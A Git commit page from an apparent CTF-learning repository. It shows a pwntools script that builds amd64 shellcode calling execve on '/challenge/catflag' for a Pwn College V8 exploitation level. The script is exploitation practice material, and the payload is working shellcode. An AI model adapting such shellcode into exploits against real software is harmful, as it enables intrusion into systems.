bjrjk/pwn-learning
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Renamed JavaScript/PwnCollegeV8Exploitation/ShellCode/catflag.py -> JavaScript/PwnCollegeV8Exploitation/ShellCode/Level1_catflag.py

Browse Source
This commit is contained in:
Jack Ren
2024-09-07 12:09:11 +08:00
parent 409a2d60cd
commit 4565c32498
1 changed files with 0 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

20
JavaScript/PwnCollegeV8Exploitation/ShellCode/Level1_catflag.py Normal file
View File

@@ -0,0 +1,20 @@
from pwn import context, shellcraft
from common import *
context(arch = 'amd64', os = 'linux')
# execve("/challenge/catflag", NULL, NULL)
assembly = f"""
/* Craft envp to rdx */
{shellcraft.amd64.push(0)}
{shellcraft.amd64.mov("rdx", "rsp")}
/* Craft argv to rsi */
{shellcraft.amd64.push(0)}
{shellcraft.amd64.mov("rsi", "rsp")}
/* Craft pathname to rdi */
{shellcraft.amd64.pushstr("/challenge/catflag")}
{shellcraft.amd64.mov("rdi", "rsp")}
/* syscall execve */
{shellcraft.amd64.linux.syscall("SYS_execve", "rdi", "rsi", "rdx")}
""".strip()
dump_machine_code(assembly)